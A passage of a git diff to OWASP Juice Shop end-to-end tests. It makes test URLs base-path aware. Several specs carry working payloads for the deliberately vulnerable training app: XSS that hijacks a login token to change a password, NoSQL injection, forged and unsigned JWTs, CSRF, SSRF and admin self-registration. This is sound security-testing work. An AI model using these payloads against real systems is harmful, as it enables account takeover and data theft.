-      browser.get('/#/search?q=%3Ciframe%20src%3D%22javascript%3Axmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%20xmlhttp.open%28%27GET%27%2C%20%27http%3A%2F%2Flocalhost%3A3000%2Frest%2Fuser%2Fchange-password%3Fnew%3DslurmCl4ssic%26amp%3Brepeat%3DslurmCl4ssic%27%29%3B%20xmlhttp.setRequestHeader%28%27Authorization%27%2C%60Bearer%3D%24%7BlocalStorage.getItem%28%27token%27%29%7D%60%29%3B%20xmlhttp.send%28%29%3B%22%3E')
+      browser.get(protractor.basePath + '/#/search?q=%3Ciframe%20src%3D%22javascript%3Axmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%20xmlhttp.open%28%27GET%27%2C%20%27http%3A%2F%2Flocalhost%3A3000%2Frest%2Fuser%2Fchange-password%3Fnew%3DslurmCl4ssic%26amp%3Brepeat%3DslurmCl4ssic%27%29%3B%20xmlhttp.setRequestHeader%28%27Authorization%27%2C%60Bearer%3D%24%7BlocalStorage.getItem%28%27token%27%29%7D%60%29%3B%20xmlhttp.send%28%29%3B%22%3E')
       browser.driver.sleep(2000)
-      browser.get('/#/login')
+      browser.get(protractor.basePath + '/#/login')
       element(by.id('email')).sendKeys('bender@' + config.get('application.domain'))
       element(by.id('password')).sendKeys('slurmCl4ssic')
       element(by.id('loginButton')).click()
diff --git a/test/e2e/complainSpec.js b/test/e2e/complainSpec.js
index 452214de6d4..c8b8bf11998 100644
--- a/test/e2e/complainSpec.js
+++ b/test/e2e/complainSpec.js
@@ -13,7 +13,7 @@ describe('/#/complain', () => {
   protractor.beforeEach.login({ email: 'admin@' + config.get('application.domain'), password: 'admin123' })
 
   beforeEach(() => {
-    browser.get('/#/complain')
+    browser.get(protractor.basePath + '/#/complain')
     file = element(by.id('file'))
     complaintMessage = element(by.id('complaintMessage'))
     submitButton = element(by.id('submitButton'))
@@ -22,7 +22,7 @@ describe('/#/complain', () => {
   describe('challenge "uploadSize"', () => {
     it('should be possible to upload files greater 100 KB directly through backend', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         const over100KB = Array.apply(null, new Array(11000)).map(String.prototype.valueOf, '1234567890')
         const blob = new Blob(over100KB, { type: 'application/pdf' })
 
@@ -30,9 +30,9 @@ describe('/#/complain', () => {
         data.append('file', blob, 'invalidSizeForClient.pdf')
 
         const request = new XMLHttpRequest()
-        request.open('POST', '/file-upload')
+        request.open('POST', baseUrl + '/file-upload')
         request.send(data)
-      })
+      }, browser.baseUrl)
       browser.driver.sleep(1000)
       browser.waitForAngularEnabled(true)
     })
@@ -42,15 +42,15 @@ describe('/#/complain', () => {
   describe('challenge "uploadType"', () => {
     it('should be possible to upload files with other extension than .pdf directly through backend', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         const data = new FormData()
         const blob = new Blob(['test'], { type: 'application/x-msdownload' })
         data.append('file', blob, 'invalidTypeForClient.exe')
 
         const request = new XMLHttpRequest()
-        request.open('POST', '/file-upload')
+        request.open('POST', baseUrl + '/file-upload')
         request.send(data)
-      })
+      }, browser.baseUrl)
       browser.driver.sleep(1000)
       browser.waitForAngularEnabled(true)
     })
@@ -119,13 +119,13 @@ describe('/#/complain', () => {
         file.sendKeys(path.resolve('test/files/videoExploit.zip'))
         submitButton.click()
         browser.waitForAngularEnabled(false)
-        browser.get('/promotion')
+        browser.get(protractor.basePath + '/promotion')
         browser.wait(EC.alertIsPresent(), 5000, "'xss' alert is not present on /promotion")
         browser.switchTo().alert().then(alert => {
           expect(alert.getText()).toEqual('xss')
           alert.accept()
         })
-        browser.get('/')
+        browser.get(protractor.basePath + '/')
         browser.driver.sleep(5000)
         browser.waitForAngularEnabled(true)
       })
diff --git a/test/e2e/contactSpec.js b/test/e2e/contactSpec.js
index 70cb295303d..3e4241b5c72 100644
--- a/test/e2e/contactSpec.js
+++ b/test/e2e/contactSpec.js
@@ -11,7 +11,7 @@ describe('/#/contact', () => {
   let comment, rating, submitButton, captcha, snackBar
 
   beforeEach(() => {
-    browser.get('/#/contact')
+    browser.get(protractor.basePath + '/#/contact')
     comment = element(by.id('comment'))
     rating = $$('.br-unit').last()
     captcha = element(by.id('captchaControl'))
@@ -37,7 +37,7 @@ describe('/#/contact', () => {
 
       submitButton.click()
 
-      browser.get('/#/administration')
+      browser.get(protractor.basePath + '/#/administration')
       expect($$('mat-row mat-cell.mat-column-user').last().getText()).toMatch('2')
     })
 
@@ -56,15 +56,18 @@ describe('/#/contact', () => {
 
         submitButton.click()
 
+        browser.sleep(5000)
+
         browser.waitForAngularEnabled(false)
-        browser.get('/#/about')
+        browser.get(protractor.basePath + '/#/about')
+
         browser.wait(EC.alertIsPresent(), 15000, "'xss' alert is not present on /#/about")
         browser.switchTo().alert().then(alert => {
           expect(alert.getText()).toEqual('xss')
           alert.accept()
         })
 
-        browser.get('/#/administration')
+        browser.get(protractor.basePath + '/#/administration')
         browser.wait(EC.alertIsPresent(), 15000, "'xss' alert is not present on /#/administration")
         browser.switchTo().alert().then(alert => {
           expect(alert.getText()).toEqual('xss')
@@ -137,7 +140,7 @@ describe('/#/contact', () => {
 
   describe('challenge "zeroStars"', () => {
     it('should be possible to post feedback with zero stars by double-clicking rating widget', () => {
-      browser.executeAsyncScript(() => {
+      browser.executeAsyncScript(baseUrl => {
         var callback = arguments[arguments.length - 1] // eslint-disable-line
         var xhttp = new XMLHttpRequest()
         var captcha
@@ -148,7 +151,7 @@ describe('/#/contact', () => {
           }
         }
 
-        xhttp.open('GET', 'http://localhost:3000/rest/captcha/', true)
+        xhttp.open('GET', baseUrl + '/rest/captcha/', true)
         xhttp.setRequestHeader('Content-type', 'text/plain')
         xhttp.send()
 
@@ -161,11 +164,11 @@ describe('/#/contact', () => {
             }
           }
 
-          xhttp.open('POST', 'http://localhost:3000/api/Feedbacks', true)
+          xhttp.open('POST', baseUrl + '/api/Feedbacks', true)
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.send(JSON.stringify({"captchaId": _captcha.captchaId, "captcha": `${_captcha.answer}`, "comment": "Comment", "rating": 0})) // eslint-disable-line
         }
-      })
+      }, browser.baseUrl)
     })
 
     protractor.expect.challengeSolved({ challenge: 'Zero Stars' })
diff --git a/test/e2e/dataExportSpec.js b/test/e2e/dataExportSpec.js
index 64a373cd599..bb0d8e340bd 100644
--- a/test/e2e/dataExportSpec.js
+++ b/test/e2e/dataExportSpec.js
@@ -8,7 +8,7 @@ const config = require('config')
 describe('/#/privacy-security/data-export', () => {
   xdescribe('challenge "dataExportChallenge"', () => {
     beforeEach(() => {
-      browser.get('/#/register')
+      browser.get(protractor.basePath + '/#/register')
       element(by.id('emailControl')).sendKeys('admun@' + config.get('application.domain'))
       element(by.id('passwordControl')).sendKeys('admun123')
       element(by.id('repeatPasswordControl')).sendKeys('admun123')
@@ -21,7 +21,7 @@ describe('/#/privacy-security/data-export', () => {
     protractor.beforeEach.login({ email: 'admun@' + config.get('application.domain'), password: 'admun123' })
 
     it('should be possible to steal admin user data by causing email clash during export', () => {
-      browser.get('/#/privacy-security/data-export')
+      browser.get(protractor.basePath + '/#/privacy-security/data-export')
       element(by.id('formatControl')).all(by.tagName('mat-radio-button')).get(0).click()
       element(by.id('submitButton')).click()
     })
diff --git a/test/e2e/deluxeSpec.js b/test/e2e/deluxeSpec.js
index 4b993d6b250..344d90b1488 100644
--- a/test/e2e/deluxeSpec.js
+++ b/test/e2e/deluxeSpec.js
@@ -11,7 +11,7 @@ describe('/#/deluxe-membership', () => {
     protractor.beforeEach.login({ email: 'jim@' + config.get('application.domain'), password: 'ncc-1701' })
 
     it('should be possible to pass in a forgotten test parameter abusing the redirect-endpoint to load an external image', () => {
-      browser.get('/#/deluxe-membership?testDecal=..%2F..%2F..%2F..%2Fredirect%3Fto%3Dhttps:%2F%2Fplacekitten.com%2Fg%2F200%2F100%3Fx%3Dhttps:%2F%2Fgithub.com%2Fbkimminich%2Fjuice-shop')
+      browser.get(protractor.basePath + '/#/deluxe-membership?testDecal=' + encodeURIComponent('../../../..' + protractor.basePath + '/redirect?to=https://placekitten.com/g/200/100?x=https://github.com/bkimminich/juice-shop'))
     })
 
     protractor.expect.challengeSolved({ challenge: 'Cross-Site Imaging' })
diff --git a/test/e2e/forgedJwtSpec.js b/test/e2e/forgedJwtSpec.js
index 0596a6f4923..7f15ac78a86 100644
--- a/test/e2e/forgedJwtSpec.js
+++ b/test/e2e/forgedJwtSpec.js
@@ -8,7 +8,7 @@ describe('/', () => {
   describe('challenge "jwtUnsigned"', () => {
     it('should accept an unsigned token with email jwtn3d@juice-sh.op in the payload ', () => {
       browser.executeScript('localStorage.setItem("token", "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJkYXRhIjp7ImVtYWlsIjoiand0bjNkQGp1aWNlLXNoLm9wIn0sImlhdCI6MTUwODYzOTYxMiwiZXhwIjo5OTk5OTk5OTk5fQ.")')
-      browser.get('/#/')
+      browser.get(protractor.basePath + '/#/')
     })
 
     protractor.expect.challengeSolved({ challenge: 'Unsigned JWT' })
@@ -18,7 +18,7 @@ describe('/', () => {
     describe('challenge "jwtForged"', () => {
       it('should accept a token HMAC-signed with public RSA key with email rsa_lord@juice-sh.op in the payload ', () => {
         browser.executeScript('localStorage.setItem("token", "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImVtYWlsIjoicnNhX2xvcmRAanVpY2Utc2gub3AifSwiaWF0IjoxNTgzMDM3NzExfQ.gShXDT5TrE5736mpIbfVDEcQbLfteJaQUG7Z0PH8Xc8")')
-        browser.get('/#/')
+        browser.get(protractor.basePath + '/#/')
       })
 
       protractor.expect.challengeSolved({ challenge: 'Forged Signed JWT' })
diff --git a/test/e2e/forgotPasswordSpec.js b/test/e2e/forgotPasswordSpec.js
index f173e85dc66..5a7b459d9d4 100644
--- a/test/e2e/forgotPasswordSpec.js
+++ b/test/e2e/forgotPasswordSpec.js
@@ -17,7 +17,7 @@ describe('/#/forgot-password', () => {
       }
     })
     browser.wait(EC.stalenessOf($('#logout')), 5000)
-    browser.get('/#/forgot-password')
+    browser.get(protractor.basePath + '/#/forgot-password')
     email = element(by.id('email'))
     securityAnswer = element(by.id('securityAnswer'))
     newPassword = element(by.id('newPassword'))
diff --git a/test/e2e/loginSpec.js b/test/e2e/loginSpec.js
index 2bd9e2819d9..010e32993ea 100644
--- a/test/e2e/loginSpec.js
+++ b/test/e2e/loginSpec.js
@@ -10,7 +10,7 @@ describe('/#/login', () => {
   let email, password, rememberMeCheckbox, loginButton
 
   beforeEach(() => {
-    browser.get('/#/login')
+    browser.get(protractor.basePath + '/#/login')
     email = element(by.id('email'))
     password = element(by.id('password'))
     rememberMeCheckbox = element(by.id('rememberMe-input'))
@@ -147,7 +147,7 @@ describe('/#/login', () => {
       rememberMeCheckbox.click()
       loginButton.click()
 
-      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); }}; xhttp.open("POST","http://localhost:3000/rest/user/login", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.setRequestHeader("X-User-Email", localStorage.getItem("email")); xhttp.send(JSON.stringify({email: "admin@juice-sh.op", password: "admin123", oauth: true}));') // eslint-disable-line
+      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); }}; xhttp.open("POST","'+browser.baseUrl+'/rest/user/login", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization",`Bearer ${localStorage.getItem("token")}`); xhttp.setRequestHeader("X-User-Email", localStorage.getItem("email")); xhttp.send(JSON.stringify({email: "admin@juice-sh.op", password: "admin123", oauth: true}));') // eslint-disable-line
 
       // Deselect to clear email field for subsequent tests
       rememberMeCheckbox.click()
diff --git a/test/e2e/metricsSpec.js b/test/e2e/metricsSpec.js
index 1a404712a47..569d686617a 100644
--- a/test/e2e/metricsSpec.js
+++ b/test/e2e/metricsSpec.js
@@ -7,7 +7,7 @@ describe('/metrics/', () => {
   describe('challenge "exposedMetrics"', () => {
     it('Challenge is solved on accessing the /metrics route', () => {
       browser.waitForAngularEnabled(false)
-      browser.get('/metrics')
+      browser.get(protractor.basePath + '/metrics')
       browser.waitForAngularEnabled(true)
     })
 
diff --git a/test/e2e/noSqlSpec.js b/test/e2e/noSqlSpec.js
index d037adb2e8e..d1790e87ab1 100644
--- a/test/e2e/noSqlSpec.js
+++ b/test/e2e/noSqlSpec.js
@@ -8,7 +8,7 @@ const utils = require('../../lib/utils')
 
 describe('/rest/products/reviews', () => {
   beforeEach(() => {
-    browser.get('/#/search')
+    browser.get(protractor.basePath + '/#/search')
   })
 
   if (!utils.disableOnContainerEnv()) {
@@ -17,17 +17,17 @@ describe('/rest/products/reviews', () => {
 
       it('should be possible to inject a command into the get route', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript(() => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 200) {
               console.log('Success')
             }
           }
-          xhttp.open('GET', 'http://localhost:3000/rest/products/sleep(1000)/reviews', true)
+          xhttp.open('GET', baseUrl + '/rest/products/sleep(1000)/reviews', true)
           xhttp.setRequestHeader('Content-type', 'text/plain')
           xhttp.send()
-        })
+        }, browser.baseUrl)
         browser.driver.sleep(5000)
         browser.waitForAngularEnabled(true)
       })
@@ -37,17 +37,17 @@ describe('/rest/products/reviews', () => {
     describe('challenge "NoSQL Exfiltration"', () => {
       it('should be possible to inject and get all the orders', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript(() => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 200) {
               console.log('Success')
             }
           }
-          xhttp.open('GET', 'http://localhost:3000/rest/track-order/%27%20%7C%7C%20true%20%7C%7C%20%27', true)
+          xhttp.open('GET', baseUrl + '/rest/track-order/%27%20%7C%7C%20true%20%7C%7C%20%27', true)
           xhttp.setRequestHeader('Content-type', 'text/plain')
           xhttp.send()
-        })
+        }, browser.baseUrl)
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
       })
@@ -58,7 +58,7 @@ describe('/rest/products/reviews', () => {
   describe('challenge "NoSQL Manipulation"', () => {
     it('should be possible to inject a selector into the update route', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PATCH","http://localhost:3000/rest/products/reviews", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({ "id": { "$ne": -1 }, "message": "NoSQL Injection!" }));') // eslint-disable-line
+      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PATCH","'+browser.baseUrl+'/rest/products/reviews", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({ "id": { "$ne": -1 }, "message": "NoSQL Injection!" }));') // eslint-disable-line
       browser.driver.sleep(1000)
       browser.waitForAngularEnabled(true)
     })
@@ -70,7 +70,7 @@ describe('/rest/products/reviews', () => {
 
     it('should be possible to edit any existing review', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         var xhttp = new XMLHttpRequest()
         xhttp.onreadystatechange = function () {
           if (this.status === 200) {
@@ -79,7 +79,7 @@ describe('/rest/products/reviews', () => {
           }
         }
 
-        xhttp.open('GET', 'http://localhost:3000/rest/products/1/reviews', true)
+        xhttp.open('GET', baseUrl + '/rest/products/1/reviews', true)
         xhttp.setRequestHeader('Content-type', 'text/plain')
         xhttp.send()
 
@@ -90,12 +90,12 @@ describe('/rest/products/reviews', () => {
               console.log('Success')
             }
           }
-          xhttp.open('PATCH', 'http://localhost:3000/rest/products/reviews', true)
+          xhttp.open('PATCH', baseUrl + '/rest/products/reviews', true)
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
           xhttp.send(JSON.stringify({ id: reviewId, message: 'injected' }))
         }
-      })
+      }, browser.baseUrl)
       browser.driver.sleep(5000)
       browser.waitForAngularEnabled(true)
     })
@@ -107,7 +107,7 @@ describe('/rest/products/reviews', () => {
 
     it('should be possible to like reviews multiple times', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         var xhttp = new XMLHttpRequest()
         xhttp.onreadystatechange = function () {
           if (this.status === 200) {
@@ -118,7 +118,7 @@ describe('/rest/products/reviews', () => {
           }
         }
 
-        xhttp.open('GET', 'http://localhost:3000/rest/products/1/reviews', true)
+        xhttp.open('GET', baseUrl + '/rest/products/1/reviews', true)
         xhttp.setRequestHeader('Content-type', 'text/plain')
         xhttp.send()
 
@@ -129,12 +129,12 @@ describe('/rest/products/reviews', () => {
               console.log('Success')
             }
           }
-          xhttp.open('POST', 'http://localhost:3000/rest/products/reviews', true)
+          xhttp.open('POST', baseUrl + '/rest/products/reviews', true)
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
           xhttp.send(JSON.stringify({ id: reviewId }))
         }
-      })
+      }, browser.baseUrl)
       browser.driver.sleep(5000)
       browser.waitForAngularEnabled(true)
     })
diff --git a/test/e2e/privacyPolicySpec.js b/test/e2e/privacyPolicySpec.js
index d65313341d3..f795d574713 100644
--- a/test/e2e/privacyPolicySpec.js
+++ b/test/e2e/privacyPolicySpec.js
@@ -6,7 +6,7 @@
 describe('/#/privacy-security/privacy-policy', () => {
   describe('challenge "privacyPolicy"', () => {
     it('should be possible to access privacy policy', () => {
-      browser.get('/#/privacy-security/privacy-policy')
+      browser.get(protractor.basePath + '/#/privacy-security/privacy-policy')
       expect(browser.getCurrentUrl()).toMatch(/\/privacy-policy/)
     })
 
diff --git a/test/e2e/profileSpec.js b/test/e2e/profileSpec.js
index f85159e6bb9..a1ee4e55caf 100644
--- a/test/e2e/profileSpec.js
+++ b/test/e2e/profileSpec.js
@@ -11,15 +11,17 @@ describe('/profile', () => {
 
   protractor.beforeEach.login({ email: 'admin@' + config.get('application.domain'), password: 'admin123' })
 
+        browser.get(protractor.basePath + '/profile')
+        browser.get(protractor.basePath + '/')
   describe('challenge "ssrf"', () => {
     it('should be possible to request internal resources using image upload URL', () => {
       browser.waitForAngularEnabled(false)
-      browser.get('/profile')
+      browser.get(protractor.basePath + '/profile')
       url = element(by.id('url'))
       submitButton = element(by.id('submitUrl'))
-      url.sendKeys('http://localhost:3000/solve/challenges/server-side?key=tRy_H4rd3r_n0thIng_iS_Imp0ssibl3')
+      url.sendKeys(browser.baseUrl + '/solve/challenges/server-side?key=tRy_H4rd3r_n0thIng_iS_Imp0ssibl3')
       submitButton.click()
-      browser.get('/')
+      browser.get(protractor.basePath + '/')
       browser.driver.sleep(5000)
       browser.waitForAngularEnabled(true)
     })
@@ -30,7 +32,7 @@ describe('/profile', () => {
     describe('challenge "usernameXss"', () => {
       it('Username field should be susceptible to XSS attacks after disarming CSP via profile image URL', () => {
         browser.waitForAngularEnabled(false)
-        browser.get('/profile')
+        browser.get(protractor.basePath + '/profile')
 
         const EC = protractor.ExpectedConditions
         url = element(by.id('url'))
@@ -53,7 +55,7 @@ describe('/profile', () => {
         url.sendKeys('http://localhost:3000/assets/public/images/uploads/default.svg')
         setProfileImageButton.click()
         browser.driver.sleep(5000)
-        browser.get('/')
+        browser.get(protractor.basePath + '/#/')
         browser.waitForAngularEnabled(true)
       })
       protractor.expect.challengeSolved({ challenge: 'CSP Bypass' })
@@ -82,7 +84,7 @@ describe('/profile', () => {
       browser.driver.sleep(1000)
       /* The script executed below is equivalent to pasting this string into http://htmledit.squarefree.com: */
       /* <form action="http://localhost:3000/profile" method="POST"><input type="hidden" name="username" value="CSRF"/><input type="submit"/></form><script>document.forms[0].submit();</script> */
-      browser.executeScript("document.getElementsByName('editbox')[0].contentDocument.getElementsByName('ta')[0].value = \"<form action=\\\"http://localhost:3000/profile\\\" method=\\\"POST\\\"><input type=\\\"hidden\\\" name=\\\"username\\\" value=\\\"CSRF\\\"/><input type=\\\"submit\\\"/></form><script>document.forms[0].submit();</script>\"")
+      browser.executeScript("document.getElementsByName('editbox')[0].contentDocument.getElementsByName('ta')[0].value = \"<form action=\\\"" + browser.baseUrl + "/profile\\\" method=\\\"POST\\\"><input type=\\\"hidden\\\" name=\\\"username\\\" value=\\\"CSRF\\\"/><input type=\\\"submit\\\"/></form><script>document.forms[0].submit();</script>\"")
       browser.driver.sleep(5000)
       browser.waitForAngularEnabled(true)
     })
diff --git a/test/e2e/registerSpec.js b/test/e2e/registerSpec.js
index f23b4c501b6..f0064254956 100644
--- a/test/e2e/registerSpec.js
+++ b/test/e2e/registerSpec.js
@@ -9,15 +9,15 @@ const utils = require('../../lib/utils')
 
 describe('/#/register', () => {
   beforeEach(() => {
-    browser.get('/#/register')
+    browser.get(protractor.basePath + '/#/register')
   })
 
   if (!utils.disableOnContainerEnv()) {
     describe('challenge "persistedXssUser"', () => {
       protractor.beforeEach.login({ email: 'admin@' + config.get('application.domain'), password: 'admin123' })
 
-      it('should be possible to bypass validation by directly using Rest API', () => {
-        browser.executeScript(() => {
+      it('should be possible to bypass validation by directly using Rest API', async () => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 201) {
@@ -25,7 +25,7 @@ describe('/#/register', () => {
             }
           }
 
-          xhttp.open('POST', 'http://localhost:3000/api/Users/', true)
+          xhttp.open('POST', baseUrl + '/api/Users/', true)
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.send(JSON.stringify({
             email: '<iframe src="javascript:alert(`xss`)">',
@@ -33,11 +33,13 @@ describe('/#/register', () => {
             passwordRepeat: 'XSSed',
             role: 'admin'
           }))
-        })
+        }, browser.baseUrl)
+
+        browser.driver.sleep(5000)
 
         browser.waitForAngularEnabled(false)
         const EC = protractor.ExpectedConditions
-        browser.get('/#/administration')
+        browser.get(protractor.basePath + '/#/administration')
         browser.wait(EC.alertIsPresent(), 10000, "'xss' alert is not present on /#/administration")
         browser.switchTo().alert().then(alert => {
           expect(alert.getText()).toEqual('xss')
@@ -62,7 +64,7 @@ describe('/#/register', () => {
 
   describe('challenge "registerAdmin"', () => {
     it('should be possible to register admin user using REST API', () => {
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         var xhttp = new XMLHttpRequest()
         xhttp.onreadystatechange = function () {
           if (this.status === 201) {
@@ -70,10 +72,10 @@ describe('/#/register', () => {
           }
         }
 
-        xhttp.open('POST', 'http://localhost:3000/api/Users/', true)
+        xhttp.open('POST', baseUrl + '/api/Users/', true)
         xhttp.setRequestHeader('Content-type', 'application/json')
         xhttp.send(JSON.stringify({ email: 'testing@test.com', password: 'pwned', passwordRepeat: 'pwned', role: 'admin' }))
-      })
+      }, browser.baseUrl)
     })
 
     protractor.expect.challengeSolved({ challenge: 'Admin Registration' })
@@ -81,7 +83,7 @@ describe('/#/register', () => {
 
   describe('challenge "passwordRepeat"', () => {
     it('should be possible to register user without repeating the password', () => {
-      browser.executeScript(() => {
+      browser.executeScript(baseUrl => {
         var xhttp = new XMLHttpRequest()
         xhttp.onreadystatechange = function () {
           if (this.status === 201) {
@@ -89,10 +91,10 @@ describe('/#/register', () => {
           }
         }
 
-        xhttp.open('POST', 'http://localhost:3000/api/Users/', true)
+        xhttp.open('POST', baseUrl + '/api/Users/', true)
         xhttp.setRequestHeader('Content-type', 'application/json')
         xhttp.send(JSON.stringify({ email: 'uncle@bob.com', password: 'ThereCanBeOnlyOne' }))
-      })
+      }, browser.baseUrl)
     })
 
     protractor.expect.challengeSolved({ challenge: 'Repetitive Registration' })
diff --git a/test/e2e/restApiSpec.js b/test/e2e/restApiSpec.js
index 39cda514581..73a9546fdc9 100644
--- a/test/e2e/restApiSpec.js
+++ b/test/e2e/restApiSpec.js
@@ -14,21 +14,21 @@ describe('/api', () => {
 
       it('should be possible to create a new product when logged in', () => {
         const EC = protractor.ExpectedConditions
-        browser.executeScript(() => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 200) {
               console.log('Success')
             }
           }
-          xhttp.open('POST', 'http://localhost:3000/api/Products', true)
+          xhttp.open('POST', baseUrl + '/api/Products', true)
           xhttp.setRequestHeader('Content-type', 'application/json')
           xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
           xhttp.send(JSON.stringify({ name: 'RestXSS', description: '<iframe src="javascript:alert(`xss`)">', price: 47.11 }))
-        })
+        }, browser.baseUrl)
 
         browser.waitForAngularEnabled(false)
-        browser.get('/#/search?q=RestXSS')
+        browser.get(protractor.basePath + '/#/search?q=RestXSS')
         browser.refresh()
         browser.driver.sleep(1000)
         const productImage = element(by.css('img[alt="RestXSS"]'))
@@ -70,11 +70,24 @@ describe('/api', () => {
 
     it('should be possible to change product via PUT request without being logged in', () => {
       browser.waitForAngularEnabled(false)
-      browser.executeScript(`var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PUT","${"http://localhost:3000/api/Products/" + tamperingProductId}", true); xhttp.setRequestHeader("Content-type","application/json"); xhttp.send(JSON.stringify({"description" : "<a href=\\"${overwriteUrl}\\" target=\\"_blank\\">More...</a>"}));`) // eslint-disable-line
+
+      browser.executeScript((baseUrl, tamperingProductId, overwriteUrl) => {
+        var xhttp = new XMLHttpRequest()
+        xhttp.onreadystatechange = function () {
+          if (this.status === 200) {
+            console.log('Success')
+          }
+        }
+        xhttp.open('PUT', baseUrl + '/api/Products/' + tamperingProductId, true)
+        xhttp.setRequestHeader('Content-type', 'application/json')
+        xhttp.send(JSON.stringify({
+          description: '<a href="' + overwriteUrl + '" target="_blank">More...</a>'
+        }))
+      }, browser.baseUrl, tamperingProductId, overwriteUrl)
       browser.driver.sleep(1000)
       browser.waitForAngularEnabled(true)
 
-      browser.get('/#/search')
+      browser.get(protractor.basePath + '/#/search')
     })
 
     protractor.expect.challengeSolved({ challenge: 'Product Tampering' })
@@ -88,18 +101,18 @@ describe('/rest/saveLoginIp', () => {
 
       it('should be possible to save log-in IP when logged in', () => {
         browser.waitForAngularEnabled(false)
-        browser.executeScript(() => {
+        browser.executeScript(baseUrl => {
           var xhttp = new XMLHttpRequest()
           xhttp.onreadystatechange = function () {
             if (this.status === 200) {
               console.log('Success')
             }
           }
-          xhttp.open('GET', 'http://localhost:3000/rest/saveLoginIp', true)
+          xhttp.open('GET', baseUrl + '/rest/saveLoginIp', true)
           xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
           xhttp.setRequestHeader('True-Client-IP', '<iframe src="javascript:alert(`xss`)">')
           xhttp.send()
-        })
+        }, browser.baseUrl)
         browser.driver.sleep(1000)
         browser.waitForAngularEnabled(true)
       })
@@ -110,7 +123,7 @@ describe('/rest/saveLoginIp', () => {
 
   it('should not be possible to save log-in IP when not logged in', () => {
     browser.waitForAngularEnabled(false)
-    browser.get('/rest/saveLoginIp')
+    browser.get(protractor.basePath + '/rest/saveLoginIp')
     $('pre').getText().then(function (text) {
       expect(text).toMatch('Unauthorized')
     })
diff --git a/test/e2e/scoreBoardSpec.js b/test/e2e/scoreBoardSpec.js
index d328e0d6192..7dccc744daa 100644
--- a/test/e2e/scoreBoardSpec.js
+++ b/test/e2e/scoreBoardSpec.js
@@ -8,7 +8,7 @@ const config = require('config')
 describe('/#/score-board', () => {
   describe('challenge "scoreBoard"', () => {
     it('should be possible to access score board', () => {
-      browser.get('/#/score-board')
+      browser.get(protractor.basePath + '/#/score-board')
       expect(browser.getCurrentUrl()).toMatch(/\/score-board/)
     })
 
@@ -17,8 +17,8 @@ describe('/#/score-board', () => {
 
   describe('challenge "continueCode"', () => {
     it('should be possible to solve the non-existent challenge #99', () => {
-      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PUT","http://localhost:3000/rest/continue-code/apply/69OxrZ8aJEgxONZyWoz1Dw4BvXmRGkM6Ae9M7k2rK63YpqQLPjnlb5V5LvDj", true); xhttp.setRequestHeader("Content-type","text/plain"); xhttp.send();') // eslint-disable-line
-      browser.get('/#/score-board')
+      browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { console.log("Success"); } }; xhttp.open("PUT","'+browser.baseUrl+'/rest/continue-code/apply/69OxrZ8aJEgxONZyWoz1Dw4BvXmRGkM6Ae9M7k2rK63YpqQLPjnlb5V5LvDj", true); xhttp.setRequestHeader("Content-type","text/plain"); xhttp.send();') // eslint-disable-line
+      browser.get(protractor.basePath + '/#/score-board')
     })
 
     protractor.expect.challengeSolved({ challenge: 'Imaginary Challenge' })
@@ -28,7 +28,7 @@ describe('/#/score-board', () => {
     let alertsBefore, alertsNow
 
     beforeEach(() => {
-      browser.get('/#/score-board')
+      browser.get(protractor.basePath + '/#/score-board')
     })
 
